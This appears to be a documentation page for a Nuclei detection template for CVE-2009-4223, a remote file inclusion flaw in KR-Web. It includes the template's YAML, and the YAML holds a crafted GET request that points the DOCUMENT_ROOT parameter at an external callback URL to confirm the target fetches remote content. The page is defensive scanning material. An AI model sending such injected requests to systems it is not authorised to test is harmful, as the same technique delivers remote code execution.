KR-Web <=1.1b2 - Remote File Inclusion
ID: CVE-2009-4223
Severity: high
Author: geeknik
Tags: cve,cve2009,krweb,rfi,edb,gianni_tommasi
Description
Section titled “Description”KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.
YAML Source
Section titled “YAML Source”id: CVE-2009-4223
info: name: KR-Web <=1.1b2 - Remote File Inclusion author: geeknik severity: high description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter. impact: | An attacker can exploit this vulnerability to include arbitrary files from remote servers, leading to remote code execution or information disclosure. remediation: | Upgrade to a patched version of KR-Web or apply the necessary security patches to fix the remote file inclusion vulnerability. reference: - https://sourceforge.net/projects/krw/ - https://www.exploit-db.com/exploits/10216 - https://exchange.xforce.ibmcloud.com/vulnerabilities/54395 - http://www.exploit-db.com/exploits/10216 - https://nvd.nist.gov/vuln/detail/CVE-2009-4223 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2009-4223 cwe-id: CWE-94 epss-score: 0.00611 epss-percentile: 0.78606 cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:* metadata: max-request: 1 vendor: gianni_tommasi product: kr-php_web_content_server tags: cve,cve2009,krweb,rfi,edb,gianni_tommasi
http: - method: GET path: - "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http"
- type: status status: - 200# digest: 4a0a0047304502206f267040c4479e8e905e35be8d0a26bf61bfdd18fc024cf0d671eef19a80585d022100b9ac1ec6db17b610594695eb2be349b9cef70986e82c1479a935e2b9dd65a559:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2009/CVE-2009-4223.yaml"